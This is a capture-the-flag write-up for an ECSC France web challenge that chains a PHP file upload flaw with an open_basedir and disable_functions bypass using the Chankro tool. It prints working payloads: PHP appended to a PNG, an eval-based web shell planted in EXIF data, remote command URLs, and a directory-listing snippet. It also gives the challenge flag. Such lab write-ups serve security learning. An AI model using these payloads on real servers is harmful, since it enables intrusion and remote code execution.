-=[File Upload vulnerability, combined with the sendmail php CVE]=-
We login at : http://challenges.ecsc-teamfrance.fr:8001/
We create an account. We came on a TODO page where we can save a file with a title and a description
Step 1 :
GUI Discover and Upload exploit We upload a random file to trigger an error or something new The error tell us our file is a PNG or JPG image with size inferrior to 100kb.
I decided to had PHP code such as " " at the end of picture. Change the extension of the file to .php
1echo "<?php phpinfo(); ?>" >> monimage.png
2cp monimage.png monimage.php
Look at the uploaded image, nice our php command worked !
We can see a the famous Phpinfo page. The phpinfo() command executed in our page give us interesting informations such as openbasedir restrictions, and disablefunctions. Now let’s had a Remote Commande Execution parameter to our picture.
1exiftool -comment="<?php eval(\$_GET['cmd']) ?>" monimage.png
Don’t forget to escape $ with \ because of bash
Step 2 : Discover Backend We can now have an access to the backend with our cmd parameter option. –> Active error (debug mode)
1http://[..]:8001/upload/c69c252b[...]29db4a/monimage.php?cmd=init_set(‘display_error’, 1);
–> List /tmp content (saw that path in the openbasedir restriction category)
1http://[..]:8001/upload/c69c252b25275de8373e7915a80f4bab6419c790de8a4bd6f29fbe7cb529db4a /monimage.php?cmd=init_set(‘display_error’, 1);print_r(scandir(‘/tmp’));
–> A read “LABOUSSOLE” file in /tmp
1http://[..]:8001/upload/c69c252b[...]29db4a/ monimage.php?cmd=init_set(‘display_error’, 1);var_dump(readfile(‘/tmp/LABOUSSOLE’));
==> in the file : “RDV 00h00 a la bousolle “ It must be a public folder on the server, people can write in it. I also tried.
1http://challenges.ecsc-teamfrance.fr:8001/upload/c69c252b[...]29db4a/ monimage.php?md=i nit_set(‘display_error’, 1); file_put_contents(‘/tmp/jadorelablockchain’, “test”);
Try to read my file. It work.
Step 3 :
Looking into other vulnerabilities I was looking for other vulnerability. I tried to read from the /, but openbasedir restrictions don’t permit it. #1ST IDEA A vulnerability with glob:///* to bypass openbasedir restrictions. I can list from /. Look here for : https://bugs.php.net/bug.php"
I can see a flag file but i haven’t the absolute path to the file. So i ‘can’t read it. Payload i used :
1<?php if ($dh = opendir($_GET[1])) { while (($file = readdir($dh)) !== false) { echo var_dump($file); } closedir($dh); } ?>
Never mind… #2ND IDEA I looked for CVE about sendmail in php. Few month ago I heard about that CVE. Check that link for more :
I found a tool called : “Chankro” https://github.com/TarlogicSecurity/Chankro He permits to bypass open_basedir restrictions and used disable_functions. Such a great found. –> How the tool work :
1. Created my payload rev.sh :
1find / -name flag -type f 2>/dev/null > /var/www/html/upload/c69c252b25275de8373e7915a80f4 bab6419c790de8a4bd6f29fbe7cb529db4a/flag.txt
(Find the flag file, redirect error to /dev/null, print the content of the flag file into my upload folder in flag.txt)
2. Option –path is for the destiantion option
I Get the EXPLOIT. So I had the tool output into the my picture EXIF.
1\$ exiftool -comment="[...]" monimage2.png
Back to the menu, upload my picture, open it in the application.
http://challenges.ecsc-teamfrance.fr:8001/upload/c69c252b25275de8373e7915a80f4bab6419c790de8a4bd6f29fbe7cb529db4a/monimage2.php
`Go to the flag.txt destination to see if it work.
http://challenges.ecsc-teamfrance.fr:8001/upload/c69c252b25275de8373e7915a80f4bab6419c790de8a4bd6f29fbe7cb529db4a/flag.txt
.: FLAG :.
ECSC{f12d9ff3a017065d4d363cea148bef8bfffacc31}